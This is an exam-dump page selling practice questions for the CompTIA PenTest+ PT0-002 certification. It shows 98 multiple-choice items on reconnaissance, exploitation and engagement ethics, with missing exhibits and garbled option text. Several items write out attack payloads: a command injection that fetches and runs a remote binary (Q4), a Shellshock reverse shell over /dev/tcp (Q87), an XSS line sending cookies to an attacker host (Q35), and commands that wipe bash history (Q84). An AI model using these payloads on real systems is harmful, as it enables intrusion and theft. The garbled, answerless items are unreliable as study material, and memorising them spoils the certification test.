HomeCompTIACompTIA PenTest+Improved CompTIA PenTest+ PT0-002 Dumps V15.02 (2024 Latest) – Choose to Make Preparations

January 2, 2024

Improved CompTIA PenTest+ PT0-002 Dumps V15.02 (2024 Latest) – Choose to Make Preparations

CompTIA PenTest+ certification stands out in the field of cybersecurity, which is a great certification to make all the difference in advancing your career. To help you pass the PT0-002 exam successfully, we at DumpsBase provide the improved CompTIA PT0-002 Dumps V15.02, which is designed to help you pass the CompTIA PenTest+ Certification exam on your first attempt. These exam questions are crafted by experts in the field and are aligned with the latest PT0-002 certification exam content. By using the most updated CompTIA PenTest+ PT0-002 exam dumps, you can effectively prepare for the final PT0-002 CompTIA PenTest+ Certification Exam and increase your chances of success.

100% Free CompTIA PenTest+ PT0-002 Dumps Demo Is Recommended to Read before Making a Purchase

1. The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

A birthday attack on 64-bit ciphers (Sweet32)

An attack that breaks RC4 encryption

An attack on a session ticket extension (Ticketbleed)

A Heartbleed attack

2. Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

NIST SP 800-53

OWASP Top 10

MITRE ATT&CK framework

PTES technical guidelines

3. The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted.

Which of the following BEST identifies this concept?

Statement of work

Program scope

Non-disclosure agreement

Rules of engagement

4. A penetration tester was able to gain access to a system using an exploit.

The following is a snippet of the code that was utilized:

exploit = “POST ”

exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C

c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a”

exploit += “HTTP/1.1”

Which of the following commands should the penetration tester run post-engagement?

grep Cv apache ~/.bash_history > ~/.bash_history

rm Crf /tmp/apache

chmod 600 /tmp/apache

taskkill /IM “apache” /F

5. A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity.

Which of the following is the MOST important action to take before starting this type of assessment?

Ensure the client has signed the SO

Verify the client has granted network access to the hot site.

Determine if the failover environment relies on resources not owned by the client.

Establish communication and escalation procedures with the client.

6. A penetration tester ran a simple Python-based scanner.

The following is a snippet of the code:

Which of the following BEST describes why this script triggered a `probable port scan` alert in the organization's IDS?

sock.settimeout(20) on line 7 caused each next socket to be created every 20 milliseconds.

*range(1, 1025) on line 1 populated the portList list in numerical order.

Line 6 uses socket.SOCK_STREAM instead of socket.SOCK_DGRAM

The remoteSvr variable has neither been type-hinted nor initialized.

7. A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue.

Which of the following BEST describes this attack?

Credential harvesting

Privilege escalation

Password spraying

Domain record abuse

8. A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache.

The attacker machine has the following:

IP Address: 192.168.1.63

Physical Address: 60-36-dd-a6-c5-33

Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

tcpdump -i eth01 arp and arp[6:2] == 2

arp -s 192.168.1.63 60-36-DD-A6-C5-33

ipconfig /all findstr /v 00-00-00 | findstr Physical

route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1

9. A penetration tester created the following script to use in an engagement:

However, the tester is receiving the following error when trying to run the script:

Which of the following is the reason for the error?

The sys variable was not defined.

The argv variable was not defined.

The sys module was not imported.

The argv module was not imported.

10. A penetration tester writes the following script:

Which of the following is the tester performing?

Searching for service vulnerabilities

Trying to recover a lost bind shell

Building a reverse shell listening on specified ports

Scanning a network for specific open ports

11. A penetration tester captured the following traffic during a web-application test:

Which of the following methods should the tester use to visualize the authorization information being transmitted?

Decode the authorization header using UTF-8.

Decrypt the authorization header using bcrypt.

Decode the authorization header using Base64.

Decrypt the authorization header using AE

12. A penetration tester runs a scan against a server and obtains the following output:

21/tcp open ftp Microsoft ftpd

| ftp-anon: Anonymous FTP login allowed (FTP code 230)

| 03-12-20 09:23AM 331 index.aspx

| ftp-syst:

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows Server 2012 Std

3389/tcp open ssl/ms-wbt-server

| rdp-ntlm-info:

| Target Name: WEB3

| NetBIOS_Computer_Name: WEB3

| Product_Version: 6.3.9600

|_ System_Time: 2021-01-15T11:32:06+00:00

8443/tcp open http Microsoft IIS httpd 8.5

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.5

|_http-title: IIS Windows Server

Which of the following command sequences should the penetration tester try NEXT?

ftp 192.168.53.23

smbclient \\WEB3\IPC$ -I 192.168.53.23 CU guest

ncrack Cu Administrator CP 15worst_passwords.txt Cp rdp 192.168.53.23

curl CX TRACE https://192.168.53.23:8443/index.aspx

nmap C-script vuln CsV 192.168.53.23

13. A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions.

Which of the following commands would help the tester START this process?

certutil Curlcache Csplit Cf http://192.168.2.124/windows-binaries/ accesschk64.exe

powershell (New-Object System.Net.WebClient).UploadFile(‘http://192.168.2.124/ upload.php’, ‘systeminfo.txt’)

schtasks /query /fo LIST /v | find /I “Next Run Time:”

wget http://192.168.2.124/windows-binaries/accesschk64.exe CO accesschk64.exe

14. DRAG DROP

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

15. A penetration tester was brute forcing an internal web server and ran a command that produced the following output:

However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed.

Which of the following is the MOST likely reason for the lack of output?

The HTTP port is not open on the firewall.

The tester did not run sudo before the command.

The web server is using HTTPS instead of HTT

This URI returned a server error.

16. A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

Determine active hosts on the network.

Set the TTL of ping packets for stealth.

Fill the ARP table of the networked devices.

Scan the system on the most used ports.

17. A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

Delete the scheduled batch job.

Close the reverse shell connection.

Downgrade the svsaccount permissions.

Remove the tester-created credentials.

18. A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago.

In which of the following places should the penetration tester look FIRST for the employees’ numbers?

Web archive

GitHub

File metadata

Underground forums

19. A penetration tester recently performed a social-engineering attack in which the tester found an employee of the target company at a local coffee shop and over time built a relationship with the employee. On the employee’s birthday, the tester gave the employee an external hard drive as a gift.

Which of the following social-engineering attacks was the tester utilizing?

Phishing

Tailgating

Baiting

Shoulder surfing

20. A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.

Which of the following tools or techniques would BEST support additional reconnaissance?

Wardriving

Shodan

Recon-ng

Aircrack-ng

21. A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment.

Identification requires the penetration tester to:

✑ Have a full TCP connection

✑ Send a “hello” payload

✑ Walt for a response

✑ Send a string of characters longer than 16 bytes

Which of the following approaches would BEST support the objective?

Run nmap CPn CsV Cscript vuln <IP address>.

Employ an OpenVAS simple scan against the TCP port of the host.

Create a script in the Lua language and use it with NS

Perform a credentialed scan with Nessus.

22. During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.

Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

Sniff and then crack the WPS PIN on an associated WiFi device.

Dump the user address book on the device.

Break a connection between two Bluetooth devices.

Transmit text messages to the device.

23. A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running.

Which of the following would BEST support this task?

Run nmap with the Co, -p22, and CsC options set against the target

Run nmap with the CsV and Cp22 options set against the target

Run nmap with the --script vulners option set against the target

Run nmap with the CsA option set against the target

24. A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function.

Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

Alternate data streams

PowerShell modules

MP4 steganography

PsExec

25. A penetration tester is testing a new version of a mobile application in a sandbox environment. To intercept and decrypt the traffic between the application and the external API, the tester has created a private root CA and issued a certificate from it. Even though the tester installed the root CA into the trusted stone of the smartphone used for the tests, the application shows an error indicating a certificate mismatch and does not connect to the server.

Which of the following is the MOST likely reason for the error?

TCP port 443 is not open on the firewall

The API server is using SSL instead of TLS

The tester is using an outdated version of the application

The application has the API certificate pinned.

26. Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

devices produce more heat and consume more power.

devices are obsolete and are no longer available for replacement.

protocols are more difficult to understand.

devices may cause physical world effects.

27. A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server.

To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted network?

nc 10.10.1.2

ssh 10.10.1.2

nc 127.0.0.1 5555

ssh 127.0.0.1 5555

28. A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food.

Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?

Tailgating

Dumpster diving

Shoulder surfing

Badge cloning

29. During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign.

Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.)

Scraping social media sites

Using the WHOIS lookup tool

Crawling the client’s website

Phishing company employees

Utilizing DNS lookup tools

Conducting wardriving near the client facility

30. A mail service company has hired a penetration tester to conduct an enumeration of all user accounts on an SMTP server to identify whether previous staff member accounts are still active.

Which of the following commands should be used to accomplish the goal?

VRFY and EXPN

VRFY and TURN

EXPN and TURN

RCPT TO and VRFY

31. Which of the following would MOST likely be included in the final report of a static application-security test that was written with a team of application developers as the intended audience?

Executive summary of the penetration-testing methods used

Bill of materials including supplies, subcontracts, and costs incurred during assessment

Quantitative impact assessments given a successful software compromise

Code context for instances of unsafe type-casting operations

32. A penetration tester performs the following command:

curl CI Chttp2 https://www.comptia.org

Which of the following snippets of output will the tester MOST likely receive?

Option A

Option B

Option C

Option D

33. A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself.

Which of the following vulnerabilities has the tester exploited?

Cross-site request forgery

Server-side request forgery

Remote file inclusion

Local file inclusion

34. A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks.

Which of the following methodologies should be used to BEST meet the client's expectations?

OWASP Top 10

MITRE ATT&CK framework

NIST Cybersecurity Framework

The Diamond Model of Intrusion Analysis

35. Given the following code:

<SCRIPT>var+img=new+Image();img.src=”http://hacker/%20+%20document.cookie;</SC

RIPT>

Which of the following are the BEST methods to prevent against this type of attack? (Choose two.)

Web-application firewall

Parameterized queries

Output encoding

Session tokens

Input validation

Base64 encoding

36. A client evaluating a penetration testing company requests examples of its work.

Which of the following represents the BEST course of action for the penetration testers?

Redact identifying information and provide a previous customer's documentation.

Allow the client to only view the information while in secure spaces.

Determine which reports are no longer under a period of confidentiality.

Provide raw output from penetration testing tools.

37. Which of the following provides an exploitation suite with payload modules that cover the broadest range of target system types?

Nessus

Metasploit

Burp Suite

Ethercap

38. Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

chmod u+x script.sh

chmod u+e script.sh

chmod o+e script.sh

chmod o+x script.sh

39. A Chief Information Security Officer wants a penetration tester to evaluate whether a recently installed firewall is protecting a subnetwork on which many decades- old legacy systems are connected. The penetration tester decides to run an OS discovery and a full port scan to identify all the systems and any potential vulnerability.

Which of the following should the penetration tester consider BEFORE running a scan?

The timing of the scan

The bandwidth limitations

The inventory of assets and versions

The type of scan

40. A penetration tester has been contracted to review wireless security. The tester has deployed a malicious wireless AP that mimics the configuration of the target enterprise WiFi. The penetration tester now wants to try to force nearby wireless stations to connect to the malicious AP.

Which of the following steps should the tester take NEXT?

Send deauthentication frames to the stations.

Perform jamming on all 2.4GHz and 5GHz channels.

Set the malicious AP to broadcast within dynamic frequency selection channels.

Modify the malicious AP configuration to not use a pre-shared key.

41. Given the following code:

Which of the following data structures is systems?

A tuple

A tree

An array

A dictionary

42. A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours.

Which of the following BEST describes why this would be necessary?

To meet PCI DSS testing requirements

For testing of the customer's SLA with the ISP

Because of concerns regarding bandwidth limitations

To ensure someone is available if something goes wrong

43. Which of the following would a company's hunt team be MOST interested in seeing in a final report?

Executive summary

Attack TTPs

Methodology

Scope details

44. A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.

Which of the following is the BEST way to ensure this is a true positive?

Run another scanner to compare.

Perform a manual test on the server.

Check the results on the scanner.

Look for the vulnerability online.

45. A company has hired a penetration tester to deploy and set up a rogue access point on the network.

Which of the following is the BEST tool to use to accomplish this goal?

Wireshark

Aircrack-ng

Kismet

Wifite

46. A penetration tester is reviewing the following SOW prior to engaging with a client:

“Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.”

Based on the information in the SOW, which of the following behaviors would be considered unethical? (Choose two.)

Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection

Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement

Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team

Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address

Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop

Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements

47. A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR."

Which of the following attacks is being attempted?

SQL injection

HTML injection

Remote command injection

DLL injection

48. A penetration tester ran a ping CA command during an unknown environment test, and it returned a 128 TTL packet.

Which of the following OSs would MOST likely return a packet of this type?

Windows

Apple

Linux

Android

49. A penetration tester needs to upload the results of a port scan to a centralized security tool.

Which of the following commands would allow the tester to save the results in an interchangeable format?

nmap -iL results 192.168.0.10-100

nmap 192.168.0.10-100 -O > results

nmap -A 192.168.0.10-100 -oX results

nmap 192.168.0.10-100 | grep "results"

50. Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

DirBuster

CeWL

w3af

Patator

51. A penetration tester downloaded the following Perl script that can be used to identify vulnerabilities in network switches. However, the script is not working properly.

Which of the following changes should the tester apply to make the script work as intended?

Change line 2 to $ip= 10.192.168.254;

Remove lines 3, 5, and 6.

Remove line 6.

Move all the lines below line 7 to the top of the script.

52. An Nmap network scan has found five open ports with identified services.

Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

OpenVAS

Drozer

Burp Suite

OWASP ZAP

53. During a penetration test, the domain names, IP ranges, hosts, and applications are defined in the:

NDA

54. A penetration tester who is conducting a vulnerability assessment discovers that ICMP is disabled on a network segment.

Which of the following could be used for a denial-of-service attack on the network segment?

Smurf

Ping flood

Fraggle

Ping of death

55. A company that developers embedded software for the automobile industry has hired a penetration-testing team to evaluate the security of its products prior to delivery. The penetration-testing team has stated its intent to subcontract to a reverse-engineering team capable of analyzing binaries to develop proof-of-concept exploits. The software company has requested additional background investigations on the reverse- engineering team prior to approval of the subcontract.

Which of the following concerns would BEST support the software company’s request?

The reverse-engineering team may have a history of selling exploits to third parties.

The reverse-engineering team may use closed-source or other non-public information feeds for its analysis.

The reverse-engineering team may not instill safety protocols sufficient for the automobile industry.

The reverse-engineering team will be given access to source code for analysis.

56. A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign.

Which of the following is the BEST passive method of obtaining the technical contacts for the website?

WHOIS domain lookup

Job listing and recruitment ads

SSL certificate information

Public data breach dumps

57. A penetration tester is working on a scoping document with a new client.

The methodology the client uses includes the following:

✑ Pre-engagement interaction (scoping and ROE)

✑ Intelligence gathering (reconnaissance)

✑ Threat modeling

✑ Vulnerability analysis

✑ Exploitation and post exploitation

✑ Reporting

Which of the following methodologies does the client use?

OWASP Web Security Testing Guide

PTES technical guidelines

NIST SP 800-115

OSSTMM

58. A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.

Which of the following actions should the tester take?

Perform forensic analysis to isolate the means of compromise and determine attribution.

Incorporate the newly identified method of compromise into the red team’s approach.

Create a detailed document of findings before continuing with the assessment.

Halt the assessment and follow the reporting procedures as outlined in the contract.

59. Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

Analyze the malware to see what it does.

Collect the proper evidence and then remove the malware.

Do a root-cause analysis to find out how the malware got in.

Remove the malware immediately.

Stop the assessment and inform the emergency contact.

60. Given the following script:

Which of the following BEST characterizes the function performed by lines 5 and 6?

Retrieves the start-of-authority information for the zone on DNS server 10.10.10.10

Performs a single DNS query for www.comptia.org and prints the raw data output

Loops through variable b to count the results returned for the DNS query and prints that count to screen

Prints each DNS query result already stored in variable b

61. A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources.

Which of the following attack types is MOST concerning to the company?

Data flooding

Session riding

Cybersquatting

Side channel

62. A penetration tester is exploring a client’s website.

The tester performs a curl command and obtains the following:

* Connected to 10.2.11.144 (::1) port 80 (#0)

> GET /readmine.html HTTP/1.1

> Host: 10.2.11.144

> User-Agent: curl/7.67.0

> Accept: */*

>

* Mark bundle as not supporting multiuse

< HTTP/1.1 200

< Date: Tue, 02 Feb 2021 21:46:47 GMT

< Server: Apache/2.4.41 (Debian)

< Content-Length: 317

< Content-Type: text/html; charset=iso-8859-1

<

<!DOCTYPE html> <html lang=”en”> <head>

<meta name=”viewport” content=”width=device-width” />

<meta http-equiv=”Content-Type” content=”text/html; charset=utf-8” /> <title>WordPress › ReadMe</title>

<link rel=”stylesheet” href=”wp-admin/css/install.css?ver=20100228” type=”text/css” /> </head>

Which of the following tools would be BEST for the penetration tester to use to explore this site further?

Burp Suite

DirBuster

WPScan

OWASP ZAP

63. A company requires that all hypervisors have the latest available patches installed.

Which of the following would BEST explain the reason why this policy is in place?

To provide protection against host OS vulnerabilities

To reduce the probability of a VM escape attack

To fix any misconfigurations of the hypervisor

To enable all features of the hypervisor

64. A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server.

Which of the following log files will show this activity?

/var/log/messages

/var/log/last_user

/var/log/user_log

/var/log/lastlog

65. A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions.

Which of the following is the MOST likely culprit?

Patch installations

Successful exploits

Application failures

Bandwidth limitations

66. In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers.

Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

Test for RFC-defined protocol conformance.

Attempt to brute force authentication to the service.

Perform a reverse DNS query and match to the service banner.

Check for an open relay configuration.

67. A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester.

Which of the following would be the most appropriate NEXT step?

Terminate the contract.

Update the ROE with new signatures. Most Voted

Scan the 8-bit block to map additional missed hosts.

Continue the assessment.

68. During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server.

Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.)

Cross-site scripting

Server-side request forgery

SQL injection

Log poisoning

Cross-site request forgery

Command injection

69. CORRECT TEXT

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

70. During an assessment, a penetration tester was able to access the organization's wireless network from outside of the building using a laptop running Aircrack-ng.

Which of the following should be recommended to the client to remediate this issue?

Changing to Wi-Fi equipment that supports strong encryption

Using directional antennae

Using WEP encryption

Disabling Wi-Fi

71. A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities.

Which of the following tools would be BEST suited for this task?

GDB

Burp Suite

SearchSpliot

Netcat

72. During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company's website and then creates a list of possible usernames based on the email address format.

Which of the following types of attacks would MOST likely be used to avoid account lockout?

Mask

Rainbow

Dictionary

Password spraying

73. Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?

SOW

SLA

MSA

NDA

74. In Python socket programming, SOCK_DGRAM type is:

reliable.

matrixed.

connectionless.

slower.

75. A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant.

Which of the following is the MINIMUM frequency to complete the scan of the system?

Weekly

Monthly

Quarterly

Annually

76. A penetration tester is trying to restrict searches on Google to a specific domain.

Which of the following commands should the penetration tester consider?

inurl:

link:

site:

intitle:

77. A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay the tester to keep quiet.

Which of the following is the BEST action for the tester to take?

Check the scoping document to determine if exfiltration is within scope.

Stop the penetration test.

Escalate the issue.

Include the discovery and interaction in the daily report.

78. A penetration tester runs the following command on a system:

find / -user root Cperm -4000 Cprint 2>/dev/null

Which of the following is the tester trying to accomplish?

Set the SGID on all files in the / directory

Find the /root directory on the system

Find files with the SUID bit set

Find files that were created during exploitation and move them to /dev/null

79. A penetration tester has gained access to a network device that has a previously unknown IP range on an interface. Further research determines this is an always-on VPN tunnel to a third-party supplier.

Which of the following is the BEST action for the penetration tester to take?

Utilize the tunnel as a means of pivoting to other internal devices.

Disregard the IP range, as it is out of scope.

Stop the assessment and inform the emergency contact.

Scan the IP range for additional systems to exploit.

80. Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

Wireshark

EAPHammer

Kismet

Aircrack-ng

81. A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.

Which of the following actions, if performed, would be ethical within the scope of the assessment?

Exploiting a configuration weakness in the SQL database

Intercepting outbound TLS traffic

Gaining access to hosts by injecting malware into the enterprise-wide update server

Leveraging a vulnerability on the internal CA to issue fraudulent client certificates

Establishing and maintaining persistence on the domain controller

82. Which of the following tools would be MOST useful in collecting vendor and other security-relevant information for IoT devices to support passive reconnaissance?

Shodan

Nmap

WebScarab-NG

Nessus

83. A penetration tester wants to test a list of common passwords against the SSH daemon on a network device.

Which of the following tools would be BEST to use for this purpose?

Hashcat

Mimikatz

Patator

John the Ripper

84. A penetration tester gains access to a system and establishes persistence, and then runs the following commands:

cat /dev/null > temp

touch Cr .bash_history temp

mv temp .bash_history

Which of the following actions is the tester MOST likely performing?

Redirecting Bash history to /dev/null

Making a copy of the user's Bash history for further enumeration

Covering tracks by clearing the Bash history

Making decoy files on the system to confuse incident responders

85. A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

Familiarity and likeness

Authority and urgency

Scarcity and fear

Social proof and greed

86. A penetration tester is testing a new API for the company's existing services and is preparing the following script:

Which of the following would the test discover?

Default web configurations

Open web ports on a host

Supported HTTP methods

Listening web servers in a domain

87. A penetration tester discovers a vulnerable web server at 10.10.1.1.

The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”,

“Accept”: “text/html,application/xhtml+xml,application/xml”}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

exploits = {“User-Agent”: “() { ignored;};/bin/sh Ci ps Cef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

88. During the reconnaissance phase, a penetration tester obtains the following output:

Reply from 192.168.1.23: bytes=32 time<54ms TTL=128

Reply from 192.168.1.23: bytes=32 time<53ms TTL=128

Reply from 192.168.1.23: bytes=32 time<60ms TTL=128

Reply from 192.168.1.23: bytes=32 time<51ms TTL=128

Which of the following operating systems is MOST likely installed on the host?

Linux

NetBSD

Windows

macOS

89. A penetration tester who is working remotely is conducting a penetration test using a wireless connection.

Which of the following is the BEST way to provide confidentiality for the client while using this connection?

Configure wireless access to use a AAA server.

Use random MAC addresses on the penetration testing distribution.

Install a host-based firewall on the penetration testing distribution.

Connect to the penetration testing company's VPS using a VP

90. DRAG DROP

During a penetration test, you gain access to a system with a limited user interface. This

machine appears to have access to an isolated network that you would like to port scan.

INSTRUCTIONS

Analyze the code segments to determine which sections are needed to complete a port scanning script.

Drag the appropriate elements into the correct locations to complete the script.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

91. A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments.

Which of the following techniques should the tester select to accomplish this task?

Steganography

Metadata removal

Encryption

Encode64

92. A penetration tester is explaining the MITRE ATT&CK framework to a company’s chief legal counsel.

Which of the following would the tester MOST likely describe as a benefit of the framework?

Understanding the tactics of a security intrusion can help disrupt them.

Scripts that are part of the framework can be imported directly into SIEM tools.

The methodology can be used to estimate the cost of an incident better.

The framework is static and ensures stability of a security program overtime.

93. A penetration tester found several critical SQL injection vulnerabilities during an assessment of a client's system. The tester would like to suggest mitigation to the client as soon as possible.

Which of the following remediation techniques would be the BEST to recommend? (Choose two.)

Closing open services

Encryption users' passwords

Randomizing users' credentials

Users' input validation

Parameterized queries

Output encoding

94. Which of the following BEST describe the OWASP Top 10? (Choose two.)

The most critical risks of web applications

A list of all the risks of web applications

The risks defined in order of importance

A web-application security standard

A risk-governance and compliance framework

A checklist of Apache vulnerabilities

95. Deconfliction is necessary when the penetration test:

determines that proprietary information is being stored in cleartext.

occurs during the monthly vulnerability scanning.

uncovers indicators of prior compromise over the course of the assessment.

proceeds in parallel with a criminal digital forensic investigation.

96. A penetration tester is scanning a corporate lab network for potentially vulnerable services.

Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

nmap192.168.1.1-5CPU22-25,80

nmap192.168.1.1-5CPA22-25,80

nmap192.168.1.1-5CPS22-25,80

nmap192.168.1.1-5CSs22-25,80

97. Which of the following BEST explains why a penetration tester cannot scan a server that was previously scanned successfully?

The IP address is wrong.

The server is unreachable.

The IP address is on the blocklist.

The IP address is on the allow list.

98. A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet.

Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?

PLCs will not act upon commands injected over the network.

Supervisors and controllers are on a separate virtual network by default.

Controllers will not validate the origin of commands.

Supervisory systems will detect a malicious injection of code/commands.

Upgrade Your CompTIA Cloud+ Certification Exam Preparation with (2024 Update) CV0-003 Dumps V13.02

Updated N10-008 Dumps (V18.02) for Achieving Success Quickly - Earn CompTIA Network+ Certification with DumpsBase

Tags:PT0-002 exam dumps

Get High Score with up-to-date CS0-001 Exam Questions

CompTIA Advanced Security Practitioner (CASP+) Certified CAS-003 Dumps Questions Updated

CompTIA Network+ N10-008 Exam Dumps: Prepare with 446 Practice Questions and Answers

About The Author

dumps

From our dumpsbase platform you could search what exams you need then test or practice online by yourself. Download the PDF file if you need directly. Any other questions you can mail [email protected]

Add a Comment

Cancel reply

Your email address will not be published. Required fields are marked *

Comment:*

Name:*

Email Address:*

Latest Free Dumps

Latest Dumps for Dell VxBlock Deploy Certification D-VXB-DY-A-24 Exam – DELL EMC D-VXB-DY-A-24 Exam Dumps (V8.02) April 27, 2024
Splunk SPLK-1004 Dumps with Actual Questions and Answers (2024 V8.02) – Pass Splunk Core Certified Advanced Power User Exam April 27, 2024
Reliable Study Guide for the Microsoft MB-700 Exam Preparation – Choose MB-700 Exam Dumps (V17.03) to Achieve Success April 27, 2024
Effortlessly Complete the HCSA-Presales-IP Network V3.0 Exam with the Most Recent Huawei H19-301_V3.0 Exam Dumps April 26, 2024
Using HPE6-A85 Dumps (V11.03) is Beneficial to Pass Your Aruba Certified Campus Access Associate Exam April 26, 2024
Complete CompTIA Data+ Certification DA0-001 Exam by Using the Most Updated DA0-001 Exam Dumps (V11.02) April 26, 2024
Pegasystems Certified Pega System Architect ‘23 Exam PEGACPSA23V1 Dumps – Great Exam Preparation Materials from DumpsBase April 25, 2024
Get the Most Updated JN0-682 Dumps (V10.02) to Prepare for Your Juniper Data Center, Professional (JNCIP-DC) Exam April 25, 2024
